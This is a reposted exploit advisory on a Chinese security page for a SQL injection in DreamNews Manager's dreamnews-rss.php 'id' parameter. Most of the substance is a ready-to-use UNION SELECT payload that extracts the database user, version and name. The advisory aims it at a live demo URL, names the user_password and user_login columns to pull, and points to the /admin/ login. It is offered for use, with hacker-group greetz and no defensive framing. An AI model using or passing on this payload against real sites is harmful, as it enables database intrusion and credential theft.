DreamNews Manager (id) Remote SQL Injection Vulnerability

所属分类：网络安全 / Exploit 阅读数： 172

收藏 0赞 0分享

#########################################################
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://dreamlevels.com/dreamnews.php
#
# DorK : N/A
#
##########################################################

Exploit:

www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

L!VE DEMO:

http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

column_name :

user_password
user_login

Admin Login :

/admin/

########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################

Im IRAQi

更多精彩内容其他人还在看

DreamNews Manager (id) Remote SQL Injection Vulnerability

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

minb 0.1.0 Remote Code Execution Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

网络赚钱

站长故事